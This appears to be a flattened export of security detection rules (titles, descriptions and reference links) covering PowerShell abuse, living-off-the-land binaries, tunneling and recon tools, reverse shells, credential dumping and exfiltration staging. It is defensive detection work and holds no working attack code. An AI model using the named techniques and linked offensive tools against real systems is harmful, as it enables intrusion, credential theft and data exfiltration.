Suspicious PowerShell IEX Execution Patterns Detects suspicious ways to run Invoke-Execution using IEX alias https://learn.microsoft.com/en-us/powershell/module/microsoft.powershell.utility/invoke-expression?view=powershell-7.2, https://www.huntress.com/blog/slashandgrab-screen-connect-post-exploitation-in-the-wild-cve-2024-1709-cve-2024-1708
Root Certificate Installed From Susp Locations Adversaries may install a root certificate on a compromised system to avoid warnings when connecting to adversary controlled web servers. https://www.microsoft.com/security/blog/2022/09/07/profiling-dev-0270-phosphorus-ransomware-operations/, https://learn.microsoft.com/en-us/powershell/module/pki/import-certificate?view=windowsserver2022-ps
Import PowerShell Modules From Suspicious Directories - ProcCreation Detects powershell scripts that import modules from suspicious directories https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1003.002/T1003.002.md
Unsigned AppX Installation Attempt Using Add-AppxPackage Detects usage of the "Add-AppxPackage" or it's alias "Add-AppPackage" to install unsigned AppX packages https://learn.microsoft.com/en-us/windows/msix/package/unsigned-package, https://twitter.com/WindowsDocs/status/1620078135080325122
Suspicious PowerShell Invocations - Specific - ProcessCreation Detects suspicious PowerShell invocation command parameters Internal Research
Suspicious Invoke-WebRequest Execution With DirectIP Detects calls to PowerShell with Invoke-WebRequest cmdlet using direct IP access https://www.huntress.com/blog/critical-vulnerabilities-in-papercut-print-management-software
Suspicious Invoke-WebRequest Execution Detects a suspicious call to Invoke-WebRequest cmdlet where the and output is located in a suspicious location https://www.sentinelone.com/blog/living-off-windows-defender-lockbit-ransomware-sideloads-cobalt-strike-through-microsoft-security-tool/
Suspicious PowerShell Mailbox Export to Share Detects usage of the powerShell New-MailboxExportRequest Cmdlet to exports a mailbox to a remote or local share, as used in ProxyShell exploitations https://youtu.be/5mqid-7zp8k?t=2481, https://blog.orange.tw/2021/08/proxylogon-a-new-attack-surface-on-ms-exchange-part-1.html, https://peterjson.medium.com/reproducing-the-proxyshell-pwn2own-exploit-49743a4ea9a1, https://m365internals.com/2022/10/07/hunting-in-on-premises-exchange-server-logs/
Malicious PowerShell Commandlets - ProcessCreation Detects Commandlet names from well-known PowerShell exploitation frameworks https://adsecurity.org/?p=2921, https://github.com/S3cur3Th1sSh1t/PowerSharpPack/tree/master/PowerSharpBinaries, https://github.com/BC-SECURITY/Invoke-ZeroLogon/blob/111d17c7fec486d9bb23387e2e828b09a26075e4/Invoke-ZeroLogon.ps1, https://github.com/xorrior/RandomPS-Scripts/blob/848c919bfce4e2d67b626cbcf4404341cfe3d3b6/Get-DXWebcamVideo.ps1, https://github.com/rvrsh3ll/Misc-Powershell-Scripts/blob/6f23bb41f9675d7e2d32bacccff75e931ae00554/OfficeMemScraper.ps1, https://github.com/dafthack/DomainPasswordSpray/blob/b13d64a5834694aa73fd2aea9911a83027c465a7/DomainPasswordSpray.ps1, https://unit42.paloaltonetworks.com/threat-assessment-black-basta-ransomware/, https://research.nccgroup.com/2022/06/06/shining-the-light-on-black-basta/, https://github.com/calebstewart/CVE-2021-1675, https://github.com/BloodHoundAD/BloodHound/blob/0927441f67161cc6dc08a53c63ceb8e333f55874/Collectors/AzureHound.ps1, https://bloodhound.readthedocs.io/en/latest/data-collection/azurehound.html, https://github.com/HarmJ0y/DAMP, https://github.com/samratashok/nishang, https://github.com/DarkCoderSc/PowerRunAsSystem/, https://github.com/besimorhino/powercat, https://github.com/Kevin-Robertson/Powermad, https://github.com/adrecon/ADRecon, https://github.com/adrecon/AzureADRecon
MSExchange Transport Agent Installation Detects the Installation of a Exchange Transport Agent https://speakerdeck.com/heirhabarov/hunting-for-persistence-via-microsoft-exchange-server-or-outlook?slide=7
Non Interactive PowerShell Process Spawned Detects non-interactive PowerShell activity by looking at the "powershell" process with a non-user GUI process such as "explorer.exe" as a parent. https://web.archive.org/web/20200925032237/https://threathunterplaybook.com/notebooks/windows/02_execution/WIN-190410151110.html
Potential PowerShell Obfuscation Via WCHAR Detects suspicious encoded character syntax often used for defense evasion https://twitter.com/0gtweet/status/1281103918693482496
Execution of Powershell Script in Public Folder This rule detects execution of PowerShell scripts located in the "C:\Users\Public" folder https://www.mandiant.com/resources/evolution-of-fin7
Tamper Windows Defender Remove-MpPreference Detects attempts to remove Windows Defender configurations using the 'MpPreference' cmdlet https://techcommunity.microsoft.com/t5/core-infrastructure-and-security/windows-10-controlled-folder-access-event-search/ba-p/2326088
RemoteFXvGPUDisablement Abuse Via AtomicTestHarnesses Detects calls to the AtomicTestHarnesses "Invoke-ATHRemoteFXvGPUDisablementCommand" which is designed to abuse the "RemoteFXvGPUDisablement.exe" binary to run custom PowerShell code via module load-order hijacking. https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1218/T1218.md, https://github.com/redcanaryco/AtomicTestHarnesses/blob/7e1e4da116801e3d6fcc6bedb207064577e40572/TestHarnesses/T1218_SignedBinaryProxyExecution/InvokeRemoteFXvGPUDisablementCommand.ps1
Potential Powershell ReverseShell Connection Detects usage of the "TcpClient" class. Which can be abused to establish remote connections and reverse-shells. As seen used by the Nishang "Invoke-PowerShellTcpOneLine" reverse shell and other. https://www.volexity.com/blog/2021/03/02/active-exploitation-of-microsoft-exchange-zero-day-vulnerabilities/, https://www.microsoft.com/security/blog/2021/03/02/hafnium-targeting-exchange-servers/, https://github.com/samratashok/nishang/blob/414ee1104526d7057f9adaeee196d91ae447283e/Shells/Invoke-PowerShellTcpOneLine.ps1
Run PowerShell Script from ADS Detects PowerShell script execution from Alternate Data Stream (ADS) https://github.com/p0shkatz/Get-ADS/blob/1c3a3562e713c254edce1995a7d9879c687c7473/Get-ADS.ps1
Run PowerShell Script from Redirected Input Stream Detects PowerShell script execution via input stream redirect https://github.com/LOLBAS-Project/LOLBAS/blob/4db780e0f0b2e2bb8cb1fa13e09196da9b9f1834/yml/LOLUtilz/OSBinaries/Powershell.yml, https://twitter.com/Moriarty_Meng/status/984380793383370752
PowerShell SAM Copy Detects suspicious PowerShell scripts accessing SAM hives https://twitter.com/splinter_code/status/1420546784250769408
Suspicious Service DACL Modification Via Set-Service Cmdlet Detects suspicious DACL modifications via the "Set-Service" cmdlet using the "SecurityDescriptorSddl" flag (Only available with PowerShell 7) that can be used to hide services or make them unstopable https://www.sans.org/blog/red-team-tactics-hiding-windows-services/, https://learn.microsoft.com/pt-br/windows/win32/secauthz/sid-strings
Suspicious PowerShell Invocation From Script Engines Detects suspicious powershell invocations from interpreters or unusual programs https://www.securitynewspaper.com/2017/03/20/attackers-leverage-excel-powershell-dns-latest-non-malware-attack/
PowerShell Set-Acl On Windows Folder Detects PowerShell scripts to set the ACL to a file in the Windows folder https://learn.microsoft.com/en-us/powershell/module/microsoft.powershell.security/set-acl?view=powershell-5.1, https://github.com/redcanaryco/atomic-red-team/blob/74438b0237d141ee9c99747976447dc884cb1a39/atomics/T1505.005/T1505.005.md
Change PowerShell Policies to an Insecure Level Detects changing the PowerShell script execution policy to a potentially insecure level using the "-ExecutionPolicy" flag. https://learn.microsoft.com/en-us/powershell/module/microsoft.powershell.security/set-executionpolicy?view=powershell-7.4, https://learn.microsoft.com/en-us/powershell/module/microsoft.powershell.core/about/about_execution_policies?view=powershell-7.4, https://adsecurity.org/?p=2604, https://thedfirreport.com/2021/11/01/from-zero-to-domain-admin/
PowerShell Script Change Permission Via Set-Acl Detects PowerShell execution to set the ACL of a file or a folder https://learn.microsoft.com/en-us/powershell/module/microsoft.powershell.security/set-acl?view=powershell-5.1, https://github.com/redcanaryco/atomic-red-team/blob/74438b0237d141ee9c99747976447dc884cb1a39/atomics/T1505.005/T1505.005.md
Service StartupType Change Via PowerShell Set-Service Detects the use of the PowerShell "Set-Service" cmdlet to change the startup type of a service to "disabled" or "manual" https://www.virustotal.com/gui/file/38283b775552da8981452941ea74191aa0d203edd3f61fb2dee7b0aea3514955
Deletion of Volume Shadow Copies via WMI with PowerShell Detects deletion of Windows Volume Shadow Copies with PowerShell code and Get-WMIObject. This technique is used by numerous ransomware families such as Sodinokibi/REvil https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1490/T1490.md#atomic-test-5---windows---delete-volume-shadow-copies-via-wmi-with-powershell, https://www.elastic.co/guide/en/security/current/volume-shadow-copy-deletion-via-powershell.html
Exchange PowerShell Snap-Ins Usage Detects adding and using Exchange PowerShell snap-ins to export mailbox data. As seen used by HAFNIUM and APT27 https://www.volexity.com/blog/2021/03/02/active-exploitation-of-microsoft-exchange-zero-day-vulnerabilities/, https://www.microsoft.com/security/blog/2021/03/02/hafnium-targeting-exchange-servers/, https://www.intrinsec.com/apt27-analysis/
Stop Windows Service Via PowerShell Stop-Service Detects the stopping of a Windows service via the PowerShell Cmdlet "Stop-Service" https://learn.microsoft.com/en-us/powershell/module/microsoft.powershell.management/stop-service?view=powershell-7.4
Suspicious PowerShell Download and Execute Pattern Detects suspicious PowerShell download patterns that are often used in malicious scripts, stagers or downloaders (make sure that your backend applies the strings case-insensitive) https://gist.github.com/jivoi/c354eaaf3019352ce32522f916c03d70, https://www.trendmicro.com/en_us/research/22/j/lv-ransomware-exploits-proxyshell-in-attack.html
Suspicious PowerShell Parameter Substring Detects suspicious PowerShell invocation with a parameter substring http://www.danielbohannon.com/blog-1/2017/3/12/powershell-execution-argument-obfuscation-how-it-can-make-detection-easier
Suspicious PowerShell Parent Process Detects a suspicious or uncommon parent processes of PowerShell https://speakerdeck.com/heirhabarov/hunting-for-powershell-abuse?slide=26
PowerShell Script Run in AppData Detects a suspicious command line execution that invokes PowerShell with reference to an AppData folder https://twitter.com/JohnLaTwC/status/1082851155481288706, https://app.any.run/tasks/f87f1c4e-47e2-4c46-9cf4-31454c06ce03
Powershell Token Obfuscation - Process Creation Detects TOKEN OBFUSCATION technique from Invoke-Obfuscation https://github.com/danielbohannon/Invoke-Obfuscation
PowerShell DownloadFile Detects the execution of powershell, a WebClient object creation and the invocation of DownloadFile in a single command line https://www.fireeye.com/blog/threat-research/2020/03/apt41-initiates-global-intrusion-campaign-using-multiple-exploits.html
User Discovery And Export Via Get-ADUser Cmdlet Detects usage of the Get-ADUser cmdlet to collect user information and output it to a file http://blog.talosintelligence.com/2022/09/lazarus-three-rats.html, https://www.microsoft.com/en-us/security/blog/2022/10/18/defenders-beware-a-case-for-post-ransomware-investigations/
Net WebClient Casing Anomalies Detects PowerShell command line contents that include a suspicious abnormal casing in the Net.Webclient (e.g. nEt.WEbCliEnT) string as used in obfuscation techniques https://app.any.run/tasks/b9040c63-c140-479b-ad59-f1bb56ce7a97/
Suspicious X509Enrollment - Process Creation Detect use of X509Enrollment https://speakerdeck.com/heirhabarov/hunting-for-powershell-abuse?slide=42, https://speakerdeck.com/heirhabarov/hunting-for-powershell-abuse?slide=41, https://learn.microsoft.com/en-us/dotnet/api/microsoft.hpc.scheduler.store.cx509enrollmentwebclassfactoryclass?view=hpc-sdk-5.1.6115
Suspicious XOR Encoded PowerShell Command Detects presence of a potentially xor encoded powershell command https://speakerdeck.com/heirhabarov/hunting-for-powershell-abuse?slide=65, https://redcanary.com/blog/yellow-cockatoo/, https://zero2auto.com/2020/05/19/netwalker-re/, https://mez0.cc/posts/cobaltstrike-powershell-exec/
Folder Compress To Potentially Suspicious Output Via Compress-Archive Cmdlet Detects PowerShell scripts that make use of the "Compress-Archive" Cmdlet in order to compress folders and files where the output is stored in a potentially suspicious location that is used often by malware for exfiltration. An adversary might compress data (e.g., sensitive documents) that is collected prior to exfiltration in order to make it portable and minimize the amount of data sent over the network. https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1074.001/T1074.001.md, https://www.cisa.gov/news-events/cybersecurity-advisories/aa23-347a
Arbitrary File Download Via PresentationHost.EXE Detects usage of "PresentationHost" which is a utility that runs ".xbap" (Browser Applications) files to download arbitrary files https://github.com/LOLBAS-Project/LOLBAS/pull/239/files
XBAP Execution From Uncommon Locations Via PresentationHost.EXE Detects the execution of ".xbap" (Browser Applications) files via PresentationHost.EXE from an uncommon location. These files can be abused to run malicious ".xbap" files any bypass AWL https://lolbas-project.github.io/lolbas/Binaries/Presentationhost/
Visual Studio NodejsTools PressAnyKey Arbitrary Binary Execution Detects child processes of Microsoft.NodejsTools.PressAnyKey.exe that can be used to execute any other binary https://twitter.com/mrd0x/status/1463526834918854661, https://gist.github.com/nasbench/a989ce64cefa8081bd50cf6ad8c491b5
Abusing Print Executable Attackers can use print.exe for remote file copy https://lolbas-project.github.io/lolbas/Binaries/Print/, https://twitter.com/Oddvarmoe/status/985518877076541440
File Download Using ProtocolHandler.exe Detects usage of "ProtocolHandler" to download files. Downloaded files will be located in the cache folder (for example - %LOCALAPPDATA%\Microsoft\Windows\INetCache\IE) https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1218/T1218.md, https://lolbas-project.github.io/lolbas/OtherMSBinaries/ProtocolHandler/
Suspicious Provlaunch.EXE Child Process Detects suspicious child processes of "provlaunch.exe" which might indicate potential abuse to proxy execution. https://lolbas-project.github.io/lolbas/Binaries/Provlaunch/, https://twitter.com/0gtweet/status/1674399582162153472
Potential Provlaunch.EXE Binary Proxy Execution Abuse Detects child processes of "provlaunch.exe" which might indicate potential abuse to proxy execution. https://lolbas-project.github.io/lolbas/Binaries/Provlaunch/, https://twitter.com/0gtweet/status/1674399582162153472
Screen Capture Activity Via Psr.EXE Detects execution of Windows Problem Steps Recorder (psr.exe), a utility used to record the user screen and clicks. https://lolbas-project.github.io/lolbas/Binaries/Psr/, https://web.archive.org/web/20200229201156/https://www.sans.org/cyber-security-summit/archives/file/summit-archive-1493861893.pdf, https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1560.001/T1560.001.md
PUA - 3Proxy Execution Detects the use of 3proxy, a tiny free proxy server https://github.com/3proxy/3proxy, https://blog.talosintelligence.com/2022/09/lazarus-three-rats.html
PUA - AdFind Suspicious Execution Detects AdFind execution with common flags seen used during attacks https://www.joeware.net/freetools/tools/adfind/, https://thedfirreport.com/2020/05/08/adfind-recon/, https://thedfirreport.com/2021/01/11/trickbot-still-alive-and-well/, https://www.microsoft.com/security/blog/2021/01/20/deep-dive-into-the-solorigate-second-stage-activation-from-sunburst-to-teardrop-and-raindrop/, https://social.technet.microsoft.com/wiki/contents/articles/7535.adfind-command-examples.aspx, https://github.com/center-for-threat-informed-defense/adversary_emulation_library/blob/bf62ece1c679b07b5fb49c4bae947fe24c81811f/fin6/Emulation_Plan/Phase1.md, https://github.com/redcanaryco/atomic-red-team/blob/0f229c0e42bfe7ca736a14023836d65baa941ed2/atomics/T1087.002/T1087.002.md#atomic-test-7---adfind---enumerate-active-directory-user-objects
PUA - Suspicious ActiveDirectory Enumeration Via AdFind.EXE Detects active directory enumeration activity using known AdFind CLI flags https://www.joeware.net/freetools/tools/adfind/, https://social.technet.microsoft.com/wiki/contents/articles/7535.adfind-command-examples.aspx, https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1087.002/T1087.002.md
PUA - AdvancedRun Execution Detects the execution of AdvancedRun utility https://twitter.com/splinter_code/status/1483815103279603714, https://medium.com/s2wblog/analysis-of-destructive-malware-whispergate-targeting-ukraine-9d5d158f19f3, https://www.elastic.co/security-labs/operation-bleeding-bear, https://www.winhelponline.com/blog/run-program-as-system-localsystem-account-windows/
PUA - AdvancedRun Suspicious Execution Detects the execution of AdvancedRun utility in the context of the TrustedInstaller, SYSTEM, Local Service or Network Service accounts https://twitter.com/splinter_code/status/1483815103279603714, https://medium.com/s2wblog/analysis-of-destructive-malware-whispergate-targeting-ukraine-9d5d158f19f3, https://www.elastic.co/security-labs/operation-bleeding-bear, https://www.winhelponline.com/blog/run-program-as-system-localsystem-account-windows/
PUA - Advanced IP Scanner Execution Detects the use of Advanced IP Scanner. Seems to be a popular tool for ransomware groups. https://news.sophos.com/en-us/2019/12/09/snatch-ransomware-reboots-pcs-into-safe-mode-to-bypass-protection/, https://www.fireeye.com/blog/threat-research/2020/05/tactics-techniques-procedures-associated-with-maze-ransomware-incidents.html, https://labs.f-secure.com/blog/prelude-to-ransomware-systembc, https://assets.documentcloud.org/documents/20444693/fbi-pin-egregor-ransomware-bc-01062021.pdf, https://thedfirreport.com/2021/01/18/all-that-for-a-coinminer, https://github.com/3CORESec/MAL-CL/tree/master/Descriptors/Other/Advanced%20IP%20Scanner
PUA - Advanced Port Scanner Execution Detects the use of Advanced Port Scanner. https://github.com/3CORESec/MAL-CL/tree/master/Descriptors/Other/Advanced%20Port%20Scanner
PUA - Chisel Tunneling Tool Execution Detects usage of the Chisel tunneling tool via the commandline arguments https://github.com/jpillora/chisel/, https://arcticwolf.com/resources/blog/lorenz-ransomware-chiseling-in/, https://blog.sekoia.io/lucky-mouse-incident-response-to-detection-engineering/
PUA - CleanWipe Execution Detects the use of CleanWipe a tool usually used to delete Symantec antivirus. https://github.com/3CORESec/MAL-CL/tree/master/Descriptors/Other/CleanWipe
PUA - Crassus Execution Detects Crassus, a Windows privilege escalation discovery tool, based on PE metadata characteristics. https://github.com/vu-ls/Crassus
PUA - CsExec Execution Detects the use of the lesser known remote execution tool named CsExec a PsExec alternative https://github.com/malcomvetter/CSExec, https://www.microsoft.com/security/blog/2022/05/09/ransomware-as-a-service-understanding-the-cybercrime-gig-economy-and-how-to-protect-yourself/
PUA - DIT Snapshot Viewer Detects the use of Ditsnap tool, an inspection tool for Active Directory database, ntds.dit. https://thedfirreport.com/2020/06/21/snatch-ransomware/, https://web.archive.org/web/20201124182207/https://github.com/yosqueoy/ditsnap
PUA - DefenderCheck Execution Detects the use of DefenderCheck, a tool to evaluate the signatures used in Microsoft Defender. It can be used to figure out the strings / byte chains used in Microsoft Defender to detect a tool and thus used for AV evasion. https://github.com/matterpreter/DefenderCheck
PUA - Fast Reverse Proxy (FRP) Execution Detects the use of Fast Reverse Proxy. frp is a fast reverse proxy to help you expose a local server behind a NAT or firewall to the Internet. https://asec.ahnlab.com/en/38156/, https://github.com/fatedier/frp
PUA- IOX Tunneling Tool Execution Detects the use of IOX - a tool for port forwarding and intranet proxy purposes https://github.com/EddieIvan01/iox
PUA - Mouse Lock Execution In Kaspersky's 2020 Incident Response Analyst Report they listed legitimate tool "Mouse Lock" as being used for both credential access and collection in security incidents. https://github.com/klsecservices/Publications/blob/657deb6a6eb6e00669afd40173f425fb49682eaa/Incident-Response-Analyst-Report-2020.pdf, https://sourceforge.net/projects/mouselock/
PUA - Netcat Suspicious Execution Detects execution of Netcat. Adversaries may use a non-application layer protocol for communication between host and C2 server or among infected hosts within a network https://nmap.org/ncat/, https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1095/T1095.md, https://www.revshells.com/
PUA - SoftPerfect Netscan Execution Detects usage of SoftPerfect's "netscan.exe". An application for scanning networks. It is actively used in-the-wild by threat actors to inspect and understand the network architecture of a victim. https://www.protect.airbus.com/blog/uncovering-cyber-intruders-netscan/, https://secjoes-reports.s3.eu-central-1.amazonaws.com/Sockbot%2Bin%2BGoLand.pdf, https://www.sentinelone.com/labs/black-basta-ransomware-attacks-deploy-custom-edr-evasion-tools-tied-to-fin7-threat-actor/, https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/yanluowang-ransomware-attacks-continue, https://research.nccgroup.com/2022/07/13/climbing-mount-everest-black-byte-bytes-back/, https://www.bleepingcomputer.com/news/security/microsoft-exchange-servers-hacked-to-deploy-hive-ransomware/, https://www.softperfect.com/products/networkscanner/
PUA - Ngrok Execution Detects the use of Ngrok, a utility used for port forwarding and tunneling, often used by threat actors to make local protected services publicly available. Involved domains are bin.equinox.io for download and *.ngrok.io for connections. https://ngrok.com/docs, https://www.fireeye.com/blog/threat-research/2021/05/shining-a-light-on-darkside-ransomware-operations.html, https://stackoverflow.com/questions/42442320/ssh-tunnel-to-ngrok-and-initiate-rdp, https://www.virustotal.com/gui/file/58d21840d915aaf4040ceb89522396124c82f325282f805d1085527e1e2ccfa1/detection, https://cybleinc.com/2021/02/15/ngrok-platform-abused-by-hackers-to-deliver-a-new-wave-of-phishing-attacks/, https://twitter.com/xorJosh/status/1598646907802451969, https://www.softwaretestinghelp.com/how-to-use-ngrok/
PUA - Nimgrab Execution Detects the usage of nimgrab, a tool bundled with the Nim programming framework and used for downloading files. https://github.com/redcanaryco/atomic-red-team/blob/28d190330fe44de6ff4767fc400cc10fa7cd6540/atomics/T1105/T1105.md
PUA - NirCmd Execution Detects the use of NirCmd tool for command execution, which could be the result of legitimate administrative activity https://www.nirsoft.net/utils/nircmd.html, https://www.winhelponline.com/blog/run-program-as-system-localsystem-account-windows/, https://www.nirsoft.net/utils/nircmd2.html#using
PUA - NirCmd Execution As LOCAL SYSTEM Detects the use of NirCmd tool for command execution as SYSTEM user https://www.nirsoft.net/utils/nircmd.html, https://www.winhelponline.com/blog/run-program-as-system-localsystem-account-windows/, https://www.nirsoft.net/utils/nircmd2.html#using
PUA - Nmap/Zenmap Execution Detects usage of namp/zenmap. Adversaries may attempt to get a listing of services running on remote hosts, including those that may be vulnerable to remote software exploitation https://nmap.org/, https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1046/T1046.md#atomic-test-3---port-scan-nmap-for-windows
PUA - NPS Tunneling Tool Execution Detects the use of NPS, a port forwarding and intranet penetration proxy server https://github.com/ehang-io/nps
PUA - NSudo Execution Detects the use of NSudo tool for command execution https://web.archive.org/web/20221019044836/https://nsudo.m2team.org/en-us/, https://www.winhelponline.com/blog/run-program-as-system-localsystem-account-windows/
PUA - PingCastle Execution Detects the execution of PingCastle, a tool designed to quickly assess the Active Directory security level. https://github.com/vletoux/pingcastle, https://thedfirreport.com/2023/10/30/netsupport-intrusion-results-in-domain-compromise/, https://github.com/fengjixuchui/Start-ADEnum/blob/e237a739db98b6104427d833004836507da36a58/Functions/Start-ADEnum.ps1#L450, https://github.com/lkys37en/Start-ADEnum/blob/5b42c54215fe5f57fc59abc52c20487d15764005/Functions/Start-ADEnum.ps1#L680, https://github.com/projectHULK/AD_Recon/blob/dde2daba9b3393a9388cbebda87068972cc0bd3b/SecurityAssessment.ps1#L2699, https://github.com/802-1x/Compliance/blob/2e53df8b6e89686a0b91116b3f42c8f717dca820/Ping%20Castle/Get-PingCastle-HTMLComplianceReport.ps1#L8, https://github.com/EvotecIT/TheDashboard/blob/481a9ce8f82f2fd55fe65220ee6486bae6df0c9d/Examples/RunReports/PingCastle.ps1
PUA - PingCastle Execution From Potentially Suspicious Parent Detects the execution of PingCastle, a tool designed to quickly assess the Active Directory security level via a script located in a potentially suspicious or uncommon location. https://github.com/vletoux/pingcastle, https://thedfirreport.com/2023/10/30/netsupport-intrusion-results-in-domain-compromise/, https://github.com/fengjixuchui/Start-ADEnum/blob/e237a739db98b6104427d833004836507da36a58/Functions/Start-ADEnum.ps1#L450, https://github.com/lkys37en/Start-ADEnum/blob/5b42c54215fe5f57fc59abc52c20487d15764005/Functions/Start-ADEnum.ps1#L680, https://github.com/projectHULK/AD_Recon/blob/dde2daba9b3393a9388cbebda87068972cc0bd3b/SecurityAssessment.ps1#L2699, https://github.com/802-1x/Compliance/blob/2e53df8b6e89686a0b91116b3f42c8f717dca820/Ping%20Castle/Get-PingCastle-HTMLComplianceReport.ps1#L8, https://github.com/EvotecIT/TheDashboard/blob/481a9ce8f82f2fd55fe65220ee6486bae6df0c9d/Examples/RunReports/PingCastle.ps1
PUA - Process Hacker Execution Detects the execution of Process Hacker based on binary metadata information (Image, Hash, Imphash, etc). Process Hacker is a tool to view and manipulate processes, kernel options and other low level options. Threat actors abused older vulnerable versions to manipulate system processes. https://processhacker.sourceforge.io/, https://www.crowdstrike.com/blog/falcon-overwatch-report-finds-increase-in-ecrime/
PUA - Radmin Viewer Utility Execution Detects the execution of Radmin which can be abused by an adversary to remotely control Windows machines https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1072/T1072.md, https://www.radmin.fr/
PUA - Potential PE Metadata Tamper Using Rcedit Detects the use of rcedit to potentially alter executable PE metadata properties, which could conceal efforts to rename system utilities for defense evasion. https://security.stackexchange.com/questions/210843/is-it-possible-to-change-original-filename-of-an-exe, https://www.virustotal.com/gui/file/02e8e8c5d430d8b768980f517b62d7792d690982b9ba0f7e04163cbc1a6e7915, https://github.com/electron/rcedit
PUA - Rclone Execution Detects execution of RClone utility for exfiltration as used by various ransomwares strains like REvil, Conti, FiveHands, etc https://research.nccgroup.com/2021/05/27/detecting-rclone-an-effective-tool-for-exfiltration/, https://thedfirreport.com/2021/03/29/sodinokibi-aka-revil-ransomware, https://us-cert.cisa.gov/ncas/analysis-reports/ar21-126a, https://labs.sentinelone.com/egregor-raas-continues-the-chaos-with-cobalt-strike-and-rclone, https://www.splunk.com/en_us/blog/security/darkside-ransomware-splunk-threat-update-and-detections.html
PUA - RunXCmd Execution Detects the use of the RunXCmd tool to execute commands with System or TrustedInstaller accounts https://www.d7xtech.com/free-software/runx/, https://www.winhelponline.com/blog/run-program-as-system-localsystem-account-windows/
PUA - Seatbelt Execution Detects the execution of the PUA/Recon tool Seatbelt via PE information of command line parameters https://github.com/GhostPack/Seatbelt, https://www.bluetangle.dev/2022/08/fastening-seatbelt-on-threat-hunting.html
PUA - System Informer Execution Detects the execution of System Informer, a task manager tool to view and manipulate processes, kernel options and other low level operations https://github.com/winsiderss/systeminformer
PUA - WebBrowserPassView Execution Detects the execution of WebBrowserPassView.exe. A password recovery tool that reveals the passwords stored by the following Web browsers, Internet Explorer (Version 4.0 - 11.0), Mozilla Firefox (All Versions), Google Chrome, Safari, and Opera https://github.com/redcanaryco/atomic-red-team/blob/40b77d63808dd4f4eafb83949805636735a1fd15/atomics/T1555.003/T1555.003.md
PUA - Wsudo Suspicious Execution Detects usage of wsudo (Windows Sudo Utility). Which is a tool that let the user execute programs with different permissions (System, Trusted Installer, Administrator...etc) https://github.com/M2Team/Privexec/
PUA - Adidnsdump Execution This tool enables enumeration and exporting of all DNS records in the zone for recon purposes of internal networks Python 3 and python.exe must be installed, Usee to Query/modify DNS records for Active Directory integrated DNS via LDAP https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1018/T1018.md#atomic-test-9---remote-system-discovery---adidnsdump
Python Inline Command Execution Detects execution of python using the "-c" flag. This is could be used as a way to launch a reverse shell or execute live python code. https://docs.python.org/3/using/cmdline.html#cmdoption-c, https://www.revshells.com/, https://pentestmonkey.net/cheat-sheet/shells/reverse-shell-cheat-sheet
Python Spawning Pretty TTY on Windows Detects python spawning a pretty tty https://www.volexity.com/blog/2022/06/02/zero-day-exploitation-of-atlassian-confluence/
Potentially Suspicious Usage Of Qemu Detects potentially suspicious execution of the Qemu utility in a Windows environment. Threat actors have leveraged this utility and this technique for achieving network access as reported by Kaspersky. https://securelist.com/network-tunneling-with-qemu/111803/, https://www.qemu.org/docs/master/system/invocation.html#hxtool-5
Query Usage To Exfil Data Detects usage of "query.exe" a system binary to exfil information such as "sessions" and "processes" for later use https://twitter.com/MichalKoczwara/status/1553634816016498688
QuickAssist Execution Detects the execution of Microsoft Quick Assist tool "QuickAssist.exe". This utility can be used by attackers to gain remote access. https://www.microsoft.com/en-us/security/blog/2024/05/15/threat-actors-misusing-quick-assist-in-social-engineering-attacks-leading-to-ransomware/, https://www.linkedin.com/posts/kevin-beaumont-security_ive-been-assisting-a-few-orgs-hit-with-successful-activity-7268055739116445701-xxjZ/, https://x.com/cyb3rops/status/1862406110365245506, https://learn.microsoft.com/en-us/windows/client-management/client-tools/quick-assist
Rar Usage with Password and Compression Level Detects the use of rar.exe, on the command line, to create an archive with password protection or with a specific compression level. This is pretty indicative of malicious actions. https://labs.sentinelone.com/the-anatomy-of-an-apt-attack-and-cobaltstrike-beacons-encoded-configuration/, https://ss64.com/bash/rar.html, https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1560.001/T1560.001.md
Files Added To An Archive Using Rar.EXE Detects usage of "rar" to add files to an archive for potential compression. An adversary may compress data (e.g. sensitive documents) that is collected prior to exfiltration in order to make it portable and minimize the amount of data sent over the network. https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1560.001/T1560.001.md, https://eqllib.readthedocs.io/en/latest/analytics/1ec33c93-3d0b-4a28-8014-dbdaae5c60ae.html
Suspicious Greedy Compression Using Rar.EXE Detects RAR usage that creates an archive from a suspicious folder, either a system folder or one of the folders often used by attackers for staging purposes https://decoded.avast.io/martinchlumecky/png-steganography
Suspicious RASdial Activity Detects suspicious process related to rasdial.exe https://twitter.com/subTee/status/891298217907830785
Process Memory Dump via RdrLeakDiag.EXE Detects the use of the Microsoft Windows Resource Leak Diagnostic tool "rdrleakdiag.exe" to dump process memory https://www.pureid.io/dumping-abusing-windows-credentials-part-1/, https://www.crowdstrike.com/blog/overwatch-exposes-aquatic-panda-in-possession-of-log-4-shell-exploit-tools/, https://lolbas-project.github.io/lolbas/Binaries/Rdrleakdiag/, https://twitter.com/0gtweet/status/1299071304805560321?s=21, https://news.sophos.com/en-us/2024/06/05/operation-crimson-palace-a-technical-deep-dive
